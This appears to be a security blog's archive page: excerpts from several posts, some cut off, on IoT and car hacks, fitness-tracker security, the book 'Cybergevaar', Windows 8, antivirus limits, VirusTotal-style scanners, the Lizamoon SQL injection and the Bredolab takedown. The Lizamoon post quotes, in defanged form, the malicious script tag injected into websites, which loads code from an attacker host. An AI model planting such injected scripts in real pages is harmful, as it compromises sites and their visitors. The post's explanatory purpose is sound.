The good news?
Did you all hear the interesting news? During the last Microsoft’s Build developer conference (see https://build.microsoft.com/ ) Microsoft announced the latest tools and technologies and how they can help today’s developers be their most creative and productive. Besides a spectacular improved ‘Cortana’, an innovative HoloLens and a new update of Visual Studio, one specific fact came to us as an interesting surprise. Ubuntu is coming to Windows 10!
Actually it came from a secret project setup by Microsoft and Canonical and it was unveiled at Kevin Gallo’s opening keynote speech during the conference in March. (see https://blogs.windows.com/buildingapps/2016/03/30/windows-10-anniversary-sdk-is-bringing-exciting-opportunities-to-developers/ ) But the good news also has some security implications?
Is the IoT industry making the same mistakes again?
The Car Industry
Especially all hacked cars made it into the latest newsflashes from online news media to the biggest media broadcasters in the world. Some examples were the Fiat Chrysler where 1.4 million cars were called back after the vendors Jeep hack and a Corvette where the brakes of the car could be remotely controlled. These examples confirmed the problems related to the whole car industry described in our former blog (e.g. The BMW problems).
The Fitness Industry
Completely different but fully related to the Internet of Things are the new wristbands, step counters or mobile fitness devices and the data they gather in-the-cloud and on the device and your smartphone. Interesting was the test performed by AV-Test, a worldwide well known independent test organization for security products. This test tried to measure how the private fitness data is transferred from the devices to the smartphones or the cloud and how secure the apps of fitness trackers are. You can find the full test here. These new fitness wristbands are very popular and it is already a trend; all activity results are recorded and analyzed in an app on the user’s smartphone. This means it is possible to immediately see how well the user performed. The question remains, however, is the data transported securely from the wristband to the user’s smartphone? Or is it possible for someone to intercept this link, copying or even manipulating the data? Or could the app itself be manipulated? Those questions were investigated, where 9 fitness wristbands or trackers together with the corresponding Android apps were monitored in live operation. How well performed those trackers in terms of security? And what about eavesdropping? (more…)
A balancing act between usability and security
The Internet of Things (IoT) gives everything an IP address so that everything can communicate with more or less anything and anyone else. The benefits and possibilities are almost infinite. But aren’t these technological developments evolving rapidly, maybe too rapidly? Smart TVs, gaming consoles, tablets, smartphones and cars can eavesdrop on us. Cameras in your laptop, smartphone and smart TV can watch us when we don’t want them to. Samsung is amending its user agreements to reassure people about the voice control on its smart TVs. BMW is rolling out a software update for the ConnectedDrive system in 2.2 million cars to prevent hackers easily being able to open the doors of the cars. These are the first signs that possibly too much has been started without reflection.
IT security Information for everybody
“Writing a book about cyber threats in a comprehensible and comprehensive way is not an easy task, but the book ‘Cybergevaar ‘ succeeds in this”, certifies the book’s first review, conducted by a well-known Belgian IT magazine, Datanews. The book “Cybergevaar” tries to provide a very readable and very accessible overview of almost every information security related problem and malware. It reaches out to the general audience and does not only target the technically savvy reader but provides information for everybody.
“Cybergevaar” starts with an overview of the history of malware and looks into the many profiles of malware writers and hackers. One of the chapters touches the topic underground economy and is using a lot of examples to explain the involvements. It is based on a whitepaper written by G Data SecurityLabs. Furthermore, new developments in the fields of cyber attacks, sabotage and espionage are discussed and looked into from different angles. The daily threats and the myths about malware are described in a detailed way. Among this, the chapter about general security tips and tricks is interesting for everybody. The book also provides a special chapter with thorough advice for companies.
While exploring the book, the reader can find several exciting security anecdotes and entertaining situations one possibly has never heard of before. Additional clarifications are provided throughout the entire book by use of attractive illustrations and easy-to-understand graphs. High-level opinions of people with experience and interest in the ICT security industry are included: Professionals such as Natalya Kasperskaya (InfoWatch), Ralf Benzmüller (G Data), Peter Kruse (CSIS Security Group), Bob Burls (Independent IT Security Consultant) are amongst the contributors. The book also seeks to elaborate on how governments and the media can play a role in the ‘education’ of users. Moreover, it gives an inside look into the computer security industry and organizations like AMTSO and EICAR. And, of course, ‘Cybergevaar’ does not miss the opportunity to highlight how the problem and its solutions may develop in the future, with a special chapter in the form of a short story – ‘Radical Ransom’ – set in the year 2033.
“Cybergevaar” by Eddy Willems, Lannoo, 213 pages, is now available in Belgian and Dutch bookstores and online shops. Plans to publish this book in other languages, such as German and English, are currently being discussed.
You can also order your version of the book via this webpage: www.lannooshop.com/gdata
About the abuse of sensational catchwords
When I think of the word ‘war’, I think of a situation where two or more sides attack one another. And the attacks lead to casualties. This should also be the case in a so called cyber war. And something like that, has not yet been seen. And quite frankly, I don’t think we will see one materializing soon.
We always loved Microsoft’s operating systems as most of them are adopted very well in the whole world and security has been improving since years. The new incarnation of Windows 8 is somewhat different to the former ones as the interface underwent some notably big changes.
Windows 8 offers the same interface on many devices: Xbox, via desktop to tablet PCs and smart phones. Microsoft tries to make a user experience that is almost universal. Nevertheless, it appears that the app functionalities under Windows RT (the one for ARM tablets) and the program of the desktop version are not always the same.
You might think that having a very similar interface on the different devices enables you to do the same things on different hardware, but that doesn’t seem to be true in all the cases. Sometimes, the decision to change the user experience and the usability is a matter of security, and that is to be welcomed, but all in all, it creates confusion for the user.
A good example is Skype, from Microsoft. You can use it on any Windows device, but it is impossible to send over files under Windows RT – most possibly because of the security restrictions, due to the sandboxing approach. That is an ambiguous feature, from a user’s point of view. And that’s not the only critical view we have.
Why basic antivirus is not failing.
So, several companies and the general public were claiming that we all were too late in stopping these threats. Looking at the case of Flame the AV industry found out that we already had some samples of it when the news became public, but we were not aware of it. The samples have never been verified as being malicious before. Also Stuxnet went undetected for over a year after it was found.
So, the question might be the following: Is the anti-virus industry ready for the next battle? Can we all, with our tight consumer antivirus industry related budgets, be up against targeted malware or APT’s created by organizations with a lot of money?
Online AV multi scanners are used quite often these days. However, not every user is aware of these sites and what their possibilities and limits are. Using the public online multi scanner services can be useful, but the analysis results don’t allow straightforward conclusions.
It is common for malware samples to remain undetectable for hours or even days. G Data has got comprehensive and fast detection rates for malware through our cloud technology. But still, some users might want to know more about a particular suspicious file or even analyze it themselves.
One of the easiest ways to accumulate a minimum of the desired information is provided by using online AV multi scanners. There is an interesting concept behind that: when you found a suspicious file on your pc, you can easily upload it to the service and have an immediate result as the file itself will be scanned with various up to date virus scan engines. This principle has been around for years now and gives you some immediate insight into a suspicious file. And there are indeed several of these scan service sites around. The most popular possibly is VirusTotal but you have several other ones like Jotti, NoVirusThanks, Metascan or Virscan, to name only some of them.
How does it work?
Let’s have a look at one of the most popular services, VirusTotal. You can submit your sample on a website but you could also use an email submission feature – whatever suits your needs. Online, you can even use some hash value searching, meaning that you can search their existing database of scanned files based on a sha1, sha256 or md5 hash. This feature is handy if you don’t have an actual file but know the hash value of it.
(This blog article has been published at the G Data Security Blog over here.)
The summer season has always been a mixture of holidays and launching new intiatives against cyberthreats if you look back at the past months. One of the new initiatives is brought to us by Microsoft with what they call the Blue Hat Prize. It is a contest that wants to generate new defensive approaches in the field of computer security. By launching this initiative, MS wants to develop new solutions to resolve security threats. And there are interesting prizes for the participants, ranging from $10,000 to $200,000.
It is known that MS also has some internal research conferences, but this new program will focus on new technology and defense against memory safety vulnerabilities especially. Microsoft clearly wants to encourage researchers to think about new ways of defeating entire classes of bugs instead of MS paying for individual bugs only, like some other companies are doing.
Lots of companies and home users “have their head in the clouds” moving their services, servers and data to the cloud without realizing they are using the cloud since a decade already and they have never given any thought about security of using services from the cloud. Even now, with financial incentives, they do not consider or look at the security implications at all.
Where does a network stop these days? Where does the business network stop? This is not easily definable anymore. Today, networks lacks clear crisp boundaries and it becomes more and more difficult to define what the real inside and outside of the corporate network is. It even becomes more and more difficult for normal users to protect themselves and to detect the real risks behind every part of the network.
It never stays quiet on the internet and new attacks or malware are seen every day. The last week however we saw an interesting mass SQL injection attack, referred to as Lizamoon, which was spreading and has infected several millions of URLs last week (March 29 until April 4). Even after a week, thousands of comprised websites don’t seem to be cleaned up, yet.
What are we talking about?
The mentioned attack uses SQL injection techniques to insert rogue code into the databases of websites. SQL injection is a code injection technique that misuses available functionality that is not filtered away properly. In other words: The vulnerability is present when user input is not correctly filtered for escape characters embedded in SQL statements or if the input is not strongly typed and by this unexpectedly executed (cf.: Wikipedia).
The following code was injected into a large number of websites:
<script src=hxxp://lizamoon . com / ur . php >
A critical look at the major takedown of BredoLab by the Dutch High Tech Crime Unit: More International Cybercrime laws needed!
Yesterday, 25 October 2010, The Dutch High Tech Crime Unit of the KLPD announced a major takedown of a large botnet, known as Bredolab.
You can find more and a copy of this blog entry at the original G Data posting page.
Bredolab is a big family of polymorphic Trojans and has been thought to install parts of the Cutwail botnet in the past. The botnet has spread through drive-by-downloads and email. Bredolab is known to send out large email spam campaigns and the installation of fake security products. The Dutch company LeaseWeb was hosting this botnet, without their knowledge. After the company was informed about this fact, they gave full cooperation to the authorities to take the botnet down.
Even though this was the largest operation against cyber crime in the Netherlands so far, it was not unique. It has been done in serveral other countries before, like the US, Spain and even in the Netherlands. The striking point is how things will be handled from here. The High Tech Crime unit will use the existing botnet infrastructure to send a program to all infected machines, showing them a warning : “Users of computers with viruses from this network will receive a notice at the time of next login with information on the degree of infection.” This screen is shown in a video. Click the following direct link to see it: http://teamhightechcrime.nationale-recherche.nl/nl_infected.php